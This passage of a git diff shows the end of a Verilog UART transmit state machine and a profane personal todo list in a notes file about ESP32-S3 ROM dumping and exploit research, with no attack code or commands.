txPinRegister <= 1; + if ((txCounter + 1) == DELAY_FRAMES) begin + if (txByteCounter == MEMORY_LENGTH - 1) begin + txState <= TX_STATE_DEBOUNCE; + end else begin + txByteCounter <= txByteCounter + 1; + txState <= TX_STATE_START_BIT; + end + txCounter <= 0; + end else + txCounter <= txCounter + 1; + end + TX_STATE_DEBOUNCE: begin + if (txCounter == 23'b111111111111111111) begin + if (btn1 == 1) + txState <= TX_STATE_IDLE; + end else + txCounter <= txCounter + 1; + end + endcase +end +endmodule \ No newline at end of file diff --git a/espe32s3notes-exploit-dev.txt b/espe32s3notes-exploit-dev.txt index 7326aa1..86a6ab6 100644 --- a/espe32s3notes-exploit-dev.txt +++ b/espe32s3notes-exploit-dev.txt @@ -40,13 +40,13 @@ ROM Elfs: todo: x reinstall esp-idf fucking again to test the reinstall script - - run dump on freenove fuckin again (twice) with latest for testing and final binutils - - run dump fuckin twice on another esp32s3 for compare - - save the shit and back the shit up - - add and push git projects + x run dump on freenove fuckin again (twice) with latest for testing and final binutils + x run dump fuckin twice on another esp32s3 for compare + x save the shit and back the shit up + x add and push git projects - document lmfao - study the fuck out of cuork's c3 exploit - - get on that fuckin binary exploit lmfao + / get on that fuckin binary exploit lmfao == scratch ==